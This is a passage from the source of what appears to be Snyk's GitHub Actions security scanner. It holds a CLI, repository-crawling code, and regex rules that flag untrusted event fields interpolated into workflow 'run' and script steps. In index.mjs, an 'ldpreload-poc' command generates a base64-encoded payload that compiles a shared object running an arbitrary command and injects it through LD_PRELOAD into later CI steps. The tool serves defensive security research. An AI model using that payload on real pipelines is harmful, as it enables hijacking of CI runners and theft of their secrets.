-------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # How to contact us 2 | 3 | Please send any issue that you feel affects the security of this module to 4 | **security@snyk.io**. 5 | 6 | # Expectations 7 | 8 | If you want to 9 | nudge us beyond the email to **security@snyk.io**, tell us you sent such an email (without the details) on another 10 | channel, such as: 11 | 12 | * A message [@snyksec](https://twitter.com/snyksec) on Twitter. 13 | * A ticket at https://support.snyk.io/ 14 | -------------------------------------------------------------------------------- /catalog-info.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: backstage.io/v1alpha1 2 | kind: Component 3 | metadata: 4 | name: github-actions-scanner 5 | description: Github Actions Scanner 6 | annotations: 7 | github.com/project-slug: snyk/github-actions-scanner 8 | github.com/team-slug: snyk/security-labs 9 | backstage.io/techdocs-ref: dir:. 10 | labels: 11 | snyk.io/businessCriticality: high 12 | snyk.io/visibility: public 13 | snyk.io/metadata-version: "2022-23-01" 14 | spec: 15 | type: external-tooling 16 | lifecycle: "-" 17 | owner: security-labs 18 | -------------------------------------------------------------------------------- /index.mjs: -------------------------------------------------------------------------------- 1 | import dotenv from 'dotenv'; 2 | import { program, Option, InvalidArgumentError } from 'commander'; 3 | import { resolve } from 'node:path'; 4 | import { readFileSync } from 'fs'; 5 | import YAML from 'yaml'; 6 | 7 | import { OutputHandler } from './lib/outputHandler.mjs'; 8 | import { logger, GITHUB_URL_RE } from './lib/utils.mjs'; 9 | import { Cloner } from './lib/clone.mjs'; 10 | import { Scanner } from './lib/scanner.mjs'; 11 | import { Action, Repo, Org } from './lib/actions.mjs'; 12 | 13 | function validateUrl(url) { 14 | if (!url.match(GITHUB_URL_RE)) { 15 | throw new InvalidArgumentError("Invalid Github URL") 16 | } 17 | return url; 18 | } 19 | 20 | async function setup(_options) { 21 | const options = { ..._options.opts(), ..._options.parent.opts() }; 22 | dotenv.config({ path: resolve(options.env) }) 23 | const outputHandler = new OutputHandler(options); 24 | const scanner = await Scanner.new(options); 25 | 26 | return { 27 | options, 28 | outputHandler, 29 | scanner 30 | } 31 | } 32 | 33 | async function main() { 34 | logger.info("github-actions-scanner by Snyk (2024)"); 35 | program 36 | .description('Github Actions Scanner') 37 | .option('-e, --env ', '.env file path.', '.env') 38 | .option('-r, --recurse', 'Recurse into referenced actions') 39 | .addOption(new Option('-m, --max-depth ', 'Max Recursion Depth').default(5).argParser(parseInt).implies({ recurse: true })) 40 | .addOption(new Option('-s, --scan-rules ', 'Comma separated list of rules to use, by ID. Negate by prefixing with !').default('').argParser(arg => arg.split(","))) 41 | 42 | .option('--output ', 'Output file path.') 43 | .addOption(new Option('-f, --format ', 'Output format').choices(["json", "text"]).default("text")) 44 | 45 | program.command("list-rules") 46 | .description("List all available rules") 47 | .action(async ({ }, _options) => { 48 | const { options, outputHandler, scanner } = await setup(_options); 49 | for (const rule of scanner.rules) { 50 | console.log(rule.id); 51 | } 52 | }) 53 | 54 | program.command("scan-repo") 55 | .description("Scan a single repo") 56 | .requiredOption('-u, --url ', 'Github repository URL.', validateUrl) 57 | .action(async ({ url }, _options) => { 58 | const { options, outputHandler, scanner } = await setup(_options); 59 | const repo = await Repo.fromUrl(url); 60 | let findings = await repo.scan(options, scanner); 61 | logger.info(`Scanned ${scanner.scanned} actions`); 62 | outputHandler.reportFindings(findings); 63 | }) 64 | 65 | program.command("scan-org") 66 | .description("Scan all repos in an org") 67 | .requiredOption('-o, --org ', 'Github org name.') 68 | .action(async ({ org: orgname }, _options) => { 69 | const { options, outputHandler, scanner } = await setup(_options); 70 | let org = new Org(orgname); 71 | let findings = await org.scan(options, scanner); 72 | logger.info(`Scanned ${scanner.scanned} actions`); 73 | outputHandler.reportFindings(findings); 74 | }) 75 | 76 | program.command("scan-actions") 77 | .description("Scan a list of standalone actions from a file") 78 | .option('-a, --actions-yaml [actions-yaml-path]', 'Analyze actions from yaml.', "./github-action-repos.yml") 79 | .action(async ({ actionsYaml: actionsYamlFile }, _options) => { 80 | const { options, outputHandler, scanner } = await setup(_options); 81 | let actionsYaml; 82 | try { 83 | let actionsContent = await readFileSync(resolve(actionsYamlFile), { encoding: 'utf8' }); 84 | actionsYaml = YAML.parse(actionsContent); 85 | } catch (e) { 86 | logger.error(`Error parsing ${actionsYamlFile}: ${e.message}`) 87 | return 88 | } 89 | let actions = []; 90 | for (const url of actionsYaml?.repos) { 91 | const repo = await Action.fromUrl(url); 92 | if (repo) actions.push(repo) 93 | } 94 | 95 | let findings = []; 96 | for (const action of actions) { 97 | findings.push(...await action.scan(options, scanner)); 98 | } 99 | logger.info(`Scanned ${scanner.scanned} actions`); 100 | outputHandler.reportFindings(findings); 101 | }) 102 | 103 | program.command("clone") 104 | .description("Pseudo-fork a repo for testing") 105 | .requiredOption('-u, --url ', 'Github repository URL.') 106 | .action(async ({ url }, _options) => { 107 | await setup(_options); 108 | const clone = new Cloner(url); 109 | return clone.run(); 110 | }) 111 | 112 | program.command("ldpreload-poc") 113 | .description("Create a PoC to exploit subsequent steps after command injection with LD_PRELOAD") 114 | .requiredOption("-c, --command ", "Command to run from the LD_PRELOAD") 115 | .addOption(new Option("-b, --base64", "Encode the code for injection")) 116 | .action(({ command, base64 }, _options) => { 117 | const ldcode = Buffer.from(`#include 118 | void __attribute__((constructor)) so_main() { unsetenv("LD_PRELOAD"); system("${command.replace("\"", "\\\"")}"); } 119 | `) 120 | const code = Buffer.from(`echo ${ldcode.toString("base64")} | base64 -d | cc -fPIC -shared -xc - -o $GITHUB_WORKSPACE/ldpreload-poc.so; echo "LD_PRELOAD=$GITHUB_WORKSPACE/ldpreload-poc.so" >> $GITHUB_ENV`) 121 | console.log() 122 | console.log(code.toString(base64 ? "base64" : "ascii")); 123 | }); 124 | 125 | program.parse(); 126 | 127 | } 128 | 129 | await main(); 130 | -------------------------------------------------------------------------------- /lib/actions.mjs: -------------------------------------------------------------------------------- 1 | import { join } from 'node:path'; 2 | import { Octokit } from 'octokit'; 3 | import chalk from 'chalk'; 4 | import { logger, GITHUB_URL_RE, ACTION_NAME_REGEX, getFilesFromArchive, actionSteps, stepMatches, evaluateStepRule } from './utils.mjs'; 5 | import { SECRET_RULES } from "./rules/common/defs.mjs"; 6 | import YAML from 'yaml'; 7 | 8 | class Org { 9 | constructor(name) { 10 | this.name = name 11 | } 12 | async getRepos() { 13 | if (this._repos !== undefined) return this._repos 14 | const octokit = new Octokit({ auth: process.env?.GITHUB_TOKEN }); 15 | this._repos = []; 16 | try { 17 | for await (const response of octokit.paginate.iterator( 18 | octokit.rest.repos.listForOrg, 19 | { 20 | org: this.name, 21 | type: "public", 22 | per_page: 100, 23 | }, 24 | )) { 25 | for (const repoData of response.data) { 26 | if (repoData.archived || repoData.fork) continue; 27 | const repo = await Repo.fromUrl(repoData.html_url); 28 | if (repo) this._repos.push(repo) 29 | } 30 | }; 31 | } catch (e) { 32 | logger.warn(`Failed to list repos for org - ${this.name}: ${e.message}`); 33 | return; 34 | } 35 | 36 | return this._repos; 37 | } 38 | 39 | async scan(options, scanner) { 40 | const repos = await this.getRepos(); 41 | if (repos !== undefined) { 42 | logger.info(`Got ${chalk.green(repos.length)} repos in ${chalk.cyan(this.name)} to analyze.`) 43 | } 44 | let findings = []; 45 | for (const repo of await this.getRepos()) { 46 | findings.push(...await repo.scan(options, scanner)); 47 | } 48 | return findings; 49 | } 50 | } 51 | 52 | class RepoCache { 53 | static repos = [] 54 | static register(repo) { 55 | RepoCache.repos.push(repo) 56 | } 57 | static find(owner, repo, ref) { 58 | for (const _repo of RepoCache.repos) { 59 | if ( 60 | _repo.owner == owner && 61 | _repo.repo == repo && 62 | _repo.ref == ref 63 | ) { 64 | logger.debug(`RepoCache HIT ${_repo.owner}/${_repo.repo}@${_repo.ref}`) 65 | return _repo 66 | } 67 | } 68 | } 69 | static async create(owner, repo, ref) { 70 | ref = ref === undefined ? "" : `/commit/${ref}` 71 | return await Repo.fromUrl(`https://github.com/${owner}/${repo}${ref}`) 72 | } 73 | static async findOrCreate(owner, repo, ref) { 74 | const found = RepoCache.find(owner, repo, ref) 75 | if (found !== undefined) return found; 76 | return await RepoCache.create(owner, repo, ref); 77 | } 78 | } 79 | 80 | class Repo { 81 | constructor(url, owner, repo, ref, defaultBranch, skip = false) { 82 | this.url = url; 83 | this.owner = owner; 84 | this.repo = repo; 85 | this.ref = ref || defaultBranch; 86 | this.skip = skip; 87 | 88 | RepoCache.register(this); 89 | } 90 | 91 | static async fromUrl(url) { 92 | let { groups: { owner, repo, ref } } = url.match(GITHUB_URL_RE); 93 | const octokit = new Octokit({ auth: process.env?.GITHUB_TOKEN }); 94 | 95 | let ret; 96 | try { 97 | ret = await octokit.rest.repos.get({ 98 | owner: owner, 99 | repo: repo 100 | }); 101 | } catch (e) { 102 | logger.warn(`Failed to get repo details for ${url}: ${e.message}`) 103 | return; 104 | } 105 | const { data: { default_branch: defaultBranch, size: repoSize, stargazers_count: stars } } = ret; 106 | let skip = repoSize > 1e6; 107 | if (repoSize > 1e6) { 108 | logger.info(`${chalk.cyan(url)} size = ${chalk.green(repoSize / 1000)} > 1GB, skipping.`); 109 | } 110 | 111 | return new Repo(url, owner, repo, ref, defaultBranch, skip); 112 | } 113 | 114 | async getActions() { 115 | if (this._actions !== undefined) return this._actions 116 | this._actions = []; 117 | const octokit = new Octokit({ auth: process.env?.GITHUB_TOKEN }); 118 | let ret; 119 | try { 120 | ret = await octokit.rest.repos.downloadTarballArchive({ owner: this.owner, repo: this.repo, ref: this.ref }); 121 | } catch (e) { 122 | logger.warn(`Failed to get tarball for ${this.owner}/${this.repo}: ${e.message}`) 123 | return this._actions; 124 | } 125 | const { url: redirectUrl } = ret; 126 | this._actionfiles = await getFilesFromArchive(redirectUrl); 127 | for (const filename of Object.keys(this._actionfiles)) { 128 | this._actions.push(await Action.fromRepoFile(this, filename)); 129 | } 130 | return this._actions; 131 | } 132 | 133 | async getFile(path) { 134 | if (this._actionfiles === undefined) await this.getActions(); 135 | let content = this._actionfiles?.[path]; 136 | return content; 137 | } 138 | 139 | async scan(options, scanner) { 140 | const actions = await this.getActions(); 141 | if (actions.length > 0) logger.info(`Got ${actions.length} actions for ${this.owner}/${this.repo}...`) 142 | let findings = []; 143 | for (const action of actions) { 144 | findings.push(...await action.scan(options, scanner)); 145 | } 146 | return findings; 147 | } 148 | 149 | // USED FOR REPORTING 150 | async triggeredBy(actionname) { 151 | let triggered = []; 152 | for (const action of await this.getActions()) { 153 | if ((await action.on())?.workflow_run?.workflows?.includes(actionname)) { 154 | triggered.push(action); 155 | } 156 | } 157 | return triggered; 158 | } 159 | // USED FOR REPORTING END 160 | } 161 | 162 | class ActionCache { 163 | static actions = [] 164 | static register(actions) { 165 | ActionCache.actions.push(actions) 166 | } 167 | static async findOrCreate(repo, path) { 168 | const found = ActionCache.find(repo, path) 169 | if (found !== undefined) return found; 170 | return await ActionCache.create(repo, path); 171 | } 172 | 173 | static find(repo, path) { 174 | for (const _action of ActionCache.actions) { 175 | if ( 176 | _action.repo !== undefined && 177 | _action.repo === repo && 178 | _action.subpath === path 179 | ) { 180 | logger.debug(`ActionCache HIT ${repo.owner}/${repo.repo}/${path}@${repo.ref}`) 181 | return _action 182 | } 183 | } 184 | } 185 | static async create(repo, path) { 186 | return new Action(repo, path); 187 | } 188 | } 189 | 190 | const DEFAULT_ACTION_PERMISSIONS = { 191 | "restricted": { 192 | "contents": "read", 193 | "packages": "read", 194 | "metadata": "read", 195 | } 196 | } 197 | 198 | class Action { 199 | constructor(repo, subpath) { 200 | this.repo = repo; // type Repo 201 | this.subpath = subpath; 202 | this.scanned = false; 203 | this.usedby = []; 204 | 205 | ActionCache.register(this); 206 | } 207 | 208 | // USED FOR REPORTING 209 | get url() { 210 | if (this.repo !== undefined) { 211 | return `https://github.com/${this.repo.owner}/${this.repo.repo}/blob/${this.repo.ref}/${this.subpath}` 212 | } else { 213 | return `https://github.com/${this.norepo.org}/${this.norepo.action}/blob/${this.norepo.ref}/${this.subpath}` 214 | } 215 | } 216 | 217 | async permissionsForJob(job) { 218 | const config = await this.parsedContent(); 219 | if (!config) return []; 220 | 221 | let extras = {}; 222 | if (config.on?.hasOwnProperty("pull_request_target")) { 223 | extras["repository"] = "write"; 224 | } 225 | 226 | const joblevel = config.jobs?.[job]?.permissions; 227 | if (joblevel) return { ...joblevel, ...extras }; 228 | 229 | const toplevel = config.permissions; 230 | if (toplevel) return { ...toplevel, ...extras }; 231 | 232 | return DEFAULT_ACTION_PERMISSIONS.restricted; 233 | } 234 | 235 | async conditionsForJobStep(jobname, stepid) { 236 | const config = await this.parsedContent(); 237 | if (!config) return []; 238 | 239 | const job = config.jobs?.[jobname]; 240 | const action = config?.runs; 241 | if (!job && !action) return {}; 242 | const steps = job || action; 243 | const step = typeof stepid === "number" ? steps.steps[stepid] : steps.steps.filter(_step => _step.name == stepid)[0]; 244 | 245 | let conditionals = { 246 | "job": { 247 | "if": job?.if, 248 | "needs": job?.needs 249 | }, 250 | "step": { 251 | "if": step?.if 252 | } 253 | } 254 | 255 | return conditionals; 256 | } 257 | 258 | async stepsAfter(jobName, stepid) { 259 | const config = await this.parsedContent(); 260 | if (!config) return [0, []]; 261 | 262 | const steps = config.jobs?.[jobName]?.steps || config.runs?.steps; 263 | if (!steps) return [0, []]; 264 | 265 | let aftersteps = []; 266 | if (typeof stepid === "number") { 267 | aftersteps = steps.slice(stepid) 268 | } else { 269 | let add = false; 270 | for (const step of steps) { 271 | if (step.name == stepid) add = true; 272 | if (add) aftersteps.push(step); 273 | } 274 | } 275 | return [steps.length - aftersteps.length, aftersteps]; 276 | } 277 | 278 | async secretsAfter(jobName, stepid) { 279 | const config = await this.parsedContent(); 280 | if (!config) return []; 281 | 282 | let secrets = []; 283 | stepMatches(SECRET_RULES, config).forEach(rule => { 284 | secrets.push({ 285 | "src": "workflow", 286 | "with_secrets": evaluateStepRule(rule, config, { "with": { "*": "secret" } }).with, 287 | "env_secrets": evaluateStepRule(rule, config, { "with": { "*": "secret" } }).env 288 | }) 289 | }) 290 | 291 | for (const [secretkey, secretvalue] of Object.entries(config.jobs?.[jobName]?.secrets || {})) { 292 | secrets.push({ 293 | "src": "job", 294 | "key": secretkey, 295 | "value": secretvalue 296 | }) 297 | } 298 | 299 | const [stepoffset, subsequentsteps] = await this.stepsAfter(jobName, stepid); 300 | for (const [stepidx, step] of subsequentsteps.entries()) { 301 | const id = step.name || stepoffset + stepidx 302 | stepMatches(SECRET_RULES, step).forEach(rule => { 303 | secrets.push({ 304 | "src": "step", 305 | "step": id, 306 | "with_secrets": evaluateStepRule(rule, step, { "with": { "*": "secret" } }).with, 307 | "env_secrets": evaluateStepRule(rule, step, { "env": { "*": "secret" } }).env 308 | }) 309 | }) 310 | } 311 | 312 | return secrets; 313 | } 314 | 315 | async triggeredWorkflows() { 316 | const config = await this.parsedContent(); 317 | if (config === undefined) return; 318 | 319 | return this.repo?.triggeredBy(config.name) || [] 320 | } 321 | async on() { 322 | const config = await this.parsedContent(); 323 | 324 | return config?.on; 325 | } 326 | async runs_on(jobname) { 327 | const config = await this.parsedContent(); 328 | 329 | return config?.jobs?.[jobname]?.["runs-on"]; 330 | 331 | } 332 | // USED FOR REPORTING END 333 | 334 | static async fromUrl(url) { 335 | let { groups: { owner, repo, ref } } = url.match(GITHUB_URL_RE); 336 | const foundrepo = await RepoCache.findOrCreate(owner, repo, ref); 337 | if (!foundrepo) return; 338 | const action = await ActionCache.findOrCreate(foundrepo, "action.yml"); 339 | return action; 340 | } 341 | 342 | static async fromRepoFile(repo, file) { 343 | return await ActionCache.findOrCreate(repo, file); 344 | } 345 | 346 | static async fromUses(repo, uses) { 347 | if (uses.startsWith('.')) { 348 | // uses: ./ 349 | // relative to root of repo 350 | const path = join(uses, "action.yml"); 351 | return await ActionCache.findOrCreate(repo, path); 352 | } else if (uses.startsWith("docker://")) { 353 | // docker hub 354 | logger.warn("uses: docker:// detected but not supported") 355 | } else { 356 | // uses: actions/checkout@v4 357 | let { groups: { org, action, subPath, ref } } = uses.match(ACTION_NAME_REGEX) 358 | if (subPath === undefined) subPath = ""; 359 | if (ref === undefined) ref = ""; 360 | const repo = await RepoCache.findOrCreate(org, action, ref); 361 | const newaction = await ActionCache.findOrCreate(repo, join(subPath, "action.yml")); 362 | if (newaction.repo === undefined) { 363 | newaction.norepo = { 364 | uses, 365 | org, 366 | action, 367 | subPath, 368 | ref 369 | } 370 | } 371 | return newaction; 372 | } 373 | } 374 | 375 | get name() { 376 | if (this.repo === undefined) { 377 | return this.norepo?.uses; 378 | } else { 379 | return `${this.repo.owner}/${this.repo.repo}/${this.subpath}@${this.repo.ref}`; 380 | } 381 | } 382 | 383 | async getFileContent() { 384 | if (this._contents !== undefined) return this._contents 385 | this._contents = this.repo?.getFile(this.subpath) || ""; 386 | return this._contents; 387 | } 388 | 389 | async parsedContent() { 390 | if (this._actionContent !== undefined) return this._actionContent; 391 | this._actionContent = {}; 392 | try { 393 | this._actionContent = YAML.parse(await this.getFileContent()); 394 | } catch (error) { 395 | logger.error(`parsedContent: Error parsing YAML content for ${this.name}: ${error.message}`); 396 | } 397 | return this._actionContent; 398 | } 399 | 400 | async getAllRecursiveActions() { 401 | if (this._uses !== undefined) return this._uses; 402 | 403 | this._uses = []; 404 | const uses = await this.getAllUses(); 405 | for (const [step, usedby] of uses) { 406 | const action = await Action.fromUses(this.repo, step.uses) 407 | action.usedby.push(usedby) 408 | this._uses.push(action) 409 | } 410 | return this._uses; 411 | } 412 | 413 | async getAllUses() { 414 | const contents = await this.getFileContent(); 415 | if (contents === undefined) return []; 416 | let yamlContent; 417 | try { 418 | yamlContent = YAML.parse(contents); 419 | } catch (error) { 420 | logger.error(`getAllUses: Error parsing YAML content for ${this.name}: ${error.message}`); 421 | return this._uses; 422 | } 423 | 424 | let subactions = []; 425 | for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) { 426 | if (step?.uses !== undefined) { 427 | subactions.push([step, { 428 | url: this.url, 429 | job: jobKey, 430 | step: step.name || stepidx, 431 | with: step.with 432 | }]) 433 | } 434 | } 435 | 436 | return subactions; 437 | } 438 | 439 | async scan(options, scanner, maxDepth = undefined) { 440 | if (this.skip) { 441 | logger.debug(`Skipping ${this.repo.owner}/${this.repo.repo}/${this.subpath}@${this.repo.ref}`) 442 | return []; 443 | } 444 | if (this.scanned) { 445 | logger.debug(`Already scanned ${this.repo.owner}/${this.repo.repo}/${this.subpath}@${this.repo.ref}. Skipping`) 446 | return []; 447 | }; 448 | this.scanned = true; 449 | 450 | logger.info(`Scanning ${this.name}...`) 451 | 452 | let findings = []; 453 | findings.push(...await scanner.scanAction(this)); 454 | 455 | if (options.recurse) { 456 | maxDepth = maxDepth === undefined ? options.maxDepth : maxDepth - 1; 457 | const subactions = await this.getAllRecursiveActions(); 458 | for (const action of subactions) { 459 | findings.push(...await action.scan(options, scanner, maxDepth)); 460 | } 461 | } 462 | return findings; 463 | } 464 | } 465 | 466 | export { Org, Repo, Action }; 467 | -------------------------------------------------------------------------------- /lib/clone.mjs: -------------------------------------------------------------------------------- 1 | import chalk from 'chalk'; 2 | import { Octokit } from 'octokit'; 3 | import { logger, GITHUB_URL_RE } from './utils.mjs'; 4 | import { spawnSync } from 'child_process'; 5 | import { mkdtempSync, rmSync } from 'fs'; 6 | import { tmpdir } from 'os'; 7 | import { join } from 'node:path'; 8 | 9 | class Git { 10 | constructor(directory) { 11 | this.directory = mkdtempSync(join(tmpdir(), 'gha-scanner-')); 12 | this.stdio = logger.level === "debug" ? "inherit" : "pipe"; 13 | } 14 | clone(repo) { 15 | spawnSync("git", [ 16 | "clone", 17 | repo, 18 | this.directory 19 | ], { 20 | shell: false, 21 | stdio: this.stdio 22 | }) 23 | } 24 | 25 | setOrigin(origin) { 26 | spawnSync("git", [ 27 | "-C", 28 | this.directory, 29 | "remote", 30 | "set-url", 31 | "origin", 32 | origin 33 | ], { 34 | shell: false, 35 | stdio: this.stdio 36 | }) 37 | } 38 | 39 | push() { 40 | spawnSync("git", [ 41 | "-C", 42 | this.directory, 43 | "push", 44 | "--all", 45 | "origin", 46 | ], { 47 | shell: false, 48 | stdio: this.stdio 49 | }) 50 | } 51 | 52 | cleanup() { 53 | rmSync(this.directory, { recursive: true, force: true }); 54 | } 55 | 56 | } 57 | 58 | class Cloner { 59 | constructor(repo) { 60 | let { groups: { 61 | owner: sourceowner, 62 | repo: sourcerepo 63 | } } = repo.match(GITHUB_URL_RE); 64 | this.sourceowner = sourceowner; 65 | this.sourcerepo = sourcerepo; 66 | 67 | if (process.env.GITHUB_TOKEN === undefined) { 68 | throw new Error("GITHUB_TOKEN not defined"); 69 | } 70 | } 71 | 72 | async login() { 73 | this.octokit = new Octokit({ auth: process.env?.GITHUB_TOKEN }); 74 | const { 75 | data: { login }, 76 | } = await this.octokit.rest.users.getAuthenticated(); 77 | this.username = login; 78 | } 79 | 80 | async createRepo() { 81 | logger.debug(`[DEBUG] Creating new repo ${chalk.green(this.username)}/${chalk.yellow(this.sourcerepo)}`); 82 | try { 83 | await this.octokit.request('POST /user/repos', { 84 | name: this.sourcerepo, 85 | description: `Clone of ${this.sourceowner}/${this.sourcerepo}`, 86 | homepage: 'https://github.com', 87 | 'private': true, 88 | headers: { 89 | 'X-GitHub-Api-Version': '2022-11-28' 90 | } 91 | }) 92 | } catch (err) { 93 | logger.error(`${err.response?.data?.message} : ${JSON.stringify(err.response?.data?.errors)}`); 94 | process.exit(1); 95 | } 96 | } 97 | 98 | cloneAndPush() { 99 | let G = new Git() 100 | logger.debug(`Cloning from ${chalk.cyan(this.sourceowner)}/${chalk.yellow(this.sourcerepo)}`); 101 | G.clone(`https://github.com/${this.sourceowner}/${this.sourcerepo}`) 102 | G.setOrigin(`https://${this.username}:${process.env.GITHUB_TOKEN}@github.com/${this.username}/${this.sourcerepo}`) 103 | logger.debug(`Pushing to ${chalk.green(this.username)}/${chalk.yellow(this.sourcerepo)}`); 104 | G.push() 105 | logger.debug(`Cleaning up ${G.directory}`); 106 | G.cleanup(); 107 | } 108 | 109 | async run() { 110 | await this.login(); 111 | logger.info(`Cloning ${chalk.cyan(this.sourceowner)}/${chalk.yellow(this.sourcerepo)} to ${chalk.green(this.username)}/${chalk.yellow(this.sourcerepo)}`); 112 | 113 | await this.createRepo(); 114 | this.cloneAndPush(); 115 | logger.info(`Repo cloned to https://github.com/${this.username}/${this.sourcerepo}`); 116 | } 117 | } 118 | export { Cloner, /* for testing */ Git }; 119 | -------------------------------------------------------------------------------- /lib/outputHandler.mjs: -------------------------------------------------------------------------------- 1 | import { writeFileSync } from 'fs'; 2 | import { logger } from './utils.mjs'; 3 | 4 | function groupBy(array, key) { 5 | let ret = {}; 6 | for (const item of array) { 7 | if (!ret.hasOwnProperty(key(item))) ret[key(item)] = []; 8 | ret[key(item)].push(item); 9 | } 10 | return ret; 11 | } 12 | 13 | class OutputHandler { 14 | constructor(options) { 15 | this.options = options; 16 | } 17 | 18 | toFile(content) { 19 | try { 20 | writeFileSync( 21 | this.options.output, 22 | content 23 | ) 24 | } catch (e) { 25 | logger.warn(`Failed writing to ${this.options.output}: ${e.message}`); 26 | } 27 | } 28 | 29 | toConsole(content) { 30 | console.log(content) 31 | } 32 | 33 | async reportFindingsJSON(findings) { 34 | let formatted = []; 35 | for (const finding of findings) { 36 | await finding.prereport(); 37 | formatted.push(await finding.toJSON()) 38 | } 39 | 40 | return JSON.stringify(formatted, null, 2); 41 | } 42 | 43 | async reportFindingsText(findings) { 44 | let formatted = []; 45 | for (const finding of findings) { 46 | await finding.prereport(); 47 | formatted.push(await finding.forText()) 48 | } 49 | 50 | let text = ""; 51 | for (const [k, repo] of Object.entries(groupBy(formatted, obj => [obj.rule, obj.repo]))) { 52 | text += `The rule ${repo[0].rule} triggered for ${repo[0].repo}\n` 53 | text += ` Documentation: ${repo[0].documentation}\n` 54 | for (const [k, subpath] of Object.entries(groupBy(repo, obj => obj.subpath))) { 55 | text += ` Workflow: ${subpath[0].subpath}\n` 56 | for (const [k, job] of Object.entries(groupBy(subpath, obj => obj.job))) { 57 | text += ` Job: ${job[0].job}\n`; 58 | for (const [k, step] of Object.entries(groupBy(job, obj => obj.step))) { 59 | text += ` Step: ${step[0].step}\n`; 60 | for (const finding of step) { 61 | text += ` - Description: ${finding.description}\n`; 62 | text += ` Permissions: ${finding.permissions}\n`; 63 | text += ` Secrets: ${finding.secrets}\n`; 64 | text += "\n"; 65 | } 66 | } 67 | } 68 | } 69 | } 70 | 71 | return text 72 | } 73 | 74 | async reportFindings(findings) { 75 | let formatted; 76 | switch (this.options.format) { 77 | case "json": 78 | formatted = await this.reportFindingsJSON(findings); 79 | break; 80 | default: 81 | case "text": 82 | formatted = await this.reportFindingsText(findings); 83 | break; 84 | } 85 | 86 | switch (this.options.output) { 87 | case undefined: 88 | this.toConsole(formatted); 89 | break; 90 | default: 91 | this.toFile(formatted); 92 | break; 93 | } 94 | } 95 | } 96 | 97 | export { OutputHandler }; 98 | -------------------------------------------------------------------------------- /lib/rules/cmd_exec.mjs: -------------------------------------------------------------------------------- 1 | import { UNTRUSTED_INPUT } from './common/defs.mjs'; 2 | import { Finding } from "./common/finding.mjs"; 3 | import { actionSteps, stepMatches, evaluateStepRule } from '../utils.mjs'; 4 | 5 | const UNTRUSTED_INPUT_RULES = UNTRUSTED_INPUT.map(input => { 6 | return { 7 | run: new RegExp(`^(?.*[$]{{[^}]*?(?${input.source}).*?}}.*)$`, "mg") 8 | } 9 | }) 10 | 11 | class CmdExec { 12 | static id = "CMD_EXEC" 13 | static documentation = "https://github.com/snyk/github-actions-scanner#CMD_EXEC" 14 | 15 | static async description(finding) { 16 | return `Run line ${finding.details.run_lineno} in the identified step unsafely interpolates ${finding.details.value} into a 'run' directive, which may result in arbitrary command execution` 17 | } 18 | 19 | static async prereport(finding) { 20 | if (finding.details.value.startsWith("inputs.")) { 21 | const key = finding.details.value.slice("inputs.".length); 22 | const set_by = finding.action.usedby.filter(step => step.with?.[key]).map(step => { 23 | return { 24 | ...step, 25 | with: { [key]: step.with[key] } 26 | } 27 | }) 28 | if (set_by.length) { 29 | finding.details.set_in = set_by 30 | } 31 | } 32 | } 33 | 34 | static async scan(action) { 35 | const yamlContent = await action.parsedContent(); 36 | let findings = []; 37 | for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) { 38 | stepMatches(UNTRUSTED_INPUT_RULES, step).forEach( 39 | rule => { 40 | const lines = evaluateStepRule(rule, step, { run: "line" }); 41 | const { run: srcs } = evaluateStepRule(rule, step, { run: "src" }); 42 | for (const [idx, line] of lines.run.entries()) { 43 | findings.push(new Finding( 44 | CmdExec, 45 | action, 46 | jobKey, 47 | step.name || stepidx, 48 | { 49 | "run_lineno": step.run.split("\n").indexOf(line), 50 | "line": line, 51 | "value": srcs[idx] 52 | } 53 | )) 54 | 55 | } 56 | } 57 | ) 58 | 59 | } 60 | return findings; 61 | } 62 | } 63 | export { CmdExec as default } 64 | -------------------------------------------------------------------------------- /lib/rules/code_injection.mjs: -------------------------------------------------------------------------------- 1 | import { UNTRUSTED_INPUT } from './common/defs.mjs'; 2 | import { Finding } from "./common/finding.mjs"; 3 | import { actionSteps, stepMatches, evaluateStepRule } from '../utils.mjs'; 4 | 5 | const CODE_INJECT_RULE = UNTRUSTED_INPUT.map(input => { 6 | return { 7 | uses: new RegExp("actions/github-script"), 8 | with: { script: new RegExp(`^(?.*[$]{{[^}]*?(?${input.source}).*?}}.*)$`, "mg") } 9 | } 10 | }); 11 | 12 | class CodeInject { 13 | static id = "CODE_INJECT" 14 | static documentation = "https://github.com/snyk/github-actions-scanner#CODE_INJECT" 15 | 16 | static async description(finding) { 17 | return `Run line ${finding.details.run_lineno} in the identified step unsafely interpolates ${finding.details.value} into actions/github-script 'script' directive, which may result in arbitrary code execution` 18 | } 19 | 20 | static async prereport(finding) { 21 | if (finding.details.value.startsWith("inputs.")) { 22 | const key = finding.details.value.slice("inputs.".length); 23 | const set_by = finding.action.usedby.filter(step => step.with?.[key]).map(step => { 24 | return { 25 | ...step, 26 | with: { [key]: step.with[key] } 27 | } 28 | }) 29 | if (set_by.length) { 30 | finding.details.set_in = set_by 31 | } 32 | } 33 | } 34 | 35 | static async scan(action) { 36 | const yamlContent = await action.parsedContent(); 37 | let findings = []; 38 | for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) { 39 | stepMatches(CODE_INJECT_RULE, step).forEach( 40 | rule => { 41 | const { with: { script: lines } } = evaluateStepRule(rule, step, { with: { script: "line" } }); 42 | const { with: { script: srcs } } = evaluateStepRule(rule, step, { with: { script: "src" } }); 43 | console.log(step); 44 | for (const [idx, line] of lines.entries()) { 45 | findings.push(new Finding( 46 | CodeInject, 47 | action, 48 | jobKey, 49 | step.name || stepidx, 50 | { 51 | "run_lineno": step.with.script.split("\n").indexOf(line), 52 | "line": line, 53 | "value": srcs[idx] 54 | } 55 | )) 56 | 57 | } 58 | } 59 | ) 60 | 61 | } 62 | return findings; 63 | } 64 | } 65 | export { CodeInject as default } 66 | -------------------------------------------------------------------------------- /lib/rules/common/defs.mjs: -------------------------------------------------------------------------------- 1 | // NOTE: this CAN be converted to a single huge unmaintainable regex. Leaving like this for readability. 2 | export const UNTRUSTED_INPUT = [ 3 | // Workflows. 4 | /github\.event\.issue\.title/, 5 | /github\.event\.issue\.body/, 6 | /github\.event\.pull_request\.title/, 7 | /github\.event\.pull_request\.body/, 8 | /github\.event\.comment\.body/, 9 | /github\.event\.review\.body/, 10 | /github\.event\.pages\.[\w.-]*\.page_name/, 11 | /github\.event\.commits\.[\w.-]*\.message/, 12 | /github\.event\.head_commit\.message/, 13 | /github\.event\.head_commit\.author\.email/, 14 